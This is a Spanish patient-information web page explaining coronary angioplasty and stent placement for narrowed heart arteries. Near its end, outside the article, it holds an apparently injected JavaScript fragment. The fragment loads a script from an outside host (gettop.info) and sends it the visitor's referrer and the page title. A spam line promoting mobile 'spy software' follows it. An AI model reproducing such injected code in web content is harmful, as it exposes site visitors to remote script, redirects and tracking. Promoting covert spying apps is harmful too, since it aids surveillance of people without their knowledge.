Angioplastia Coronaria

Angioplastia CoronLa angioplastia coronaria es una intervención que se realiza para abrir arterias coronarias —arterias del corazón— que estén obstruidas o estrechadas. La intervención mejora la circulación de sangre al músculo cardíaco o músculo del corazón.

Con el paso del tiempo, una sustancia grasa llamada placa puede acumularse en las arterias y hacer que se endurezcan y estrechen. Esta afección se llama ateroesclerosis. La ateroesclerosis puede afectar a cualquier arteria del cuerpo. Cuando afecta a las arterias coronarias, causa la enfermedad coronaria o enfermedad de las arterias coronarias.

La angioplastia puede restablecer la circulación de sangre al corazón si las arterias coronarias se han estrechado u obstruido debido a la enfermedad coronaria.

La angioplastia es una intervención médica corriente. Se puede realizar para lograr lo siguiente:

– Mejorar los síntomas de la enfermedad coronaria, como la angina y la sensación de falta de aliento. (La angina consiste en dolor o molestias en el pecho).
– Disminuir el daño que sufre el músculo del corazón en un ataque cardíaco. El ataque cardíaco ocurre si la circulación de una de las arterias coronarias está completamente bloqueada. El bloqueo se debe por lo general a un coágulo de sangre que se forma en la superficie de la placa. Durante la angioplastia se infla un globo pequeño dentro de la arteria coronaria para eliminar el bloqueo.
– Disminuir el riesgo de muerte en algunos pacientes.

Como se realiza? Para ello se introduce un catéter, como en el cateterismo cardiaco, hasta llegar a la zona afectada. En esta lugar se hincha un pequeño balón que dilata desde dentro la arteria.

En la mayoria de los casos se coloca un STENT:

Los stents son dispositivos metálicos de diferentes diseños que se introducen en las arterias coronarias y actúan apuntalando su pared. De esta forma se evita la oclusión o cierre brusco de la arteria posterior.

¿Cómo se implanta un stent?

A través de una angioplastia que se realiza sin anestesia general. La angioplastia consiste en introducir un balón en la arteria femoral a través de un pinchazo en la ingle y llevarlo al corazón guiándose por rayos X. Al inflar el balón, la zona estrechada se dilata y la sangre fluye normalmente. Tras realizar el inflado del balón, se coloca un stent coronario. En la mayoría de los casos, el paciente recibe el alta entre las 24 y las 48 horas posteriores al procedimiento.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; https://topspyapps.net – The most popular 2017 spy software applications for the mobile phones.

Compartir en...Share on FacebookPrint this pageEmail this to someoneTweet about this on TwitterShare on LinkedIn
Web Design BangladeshBangladesh Online Market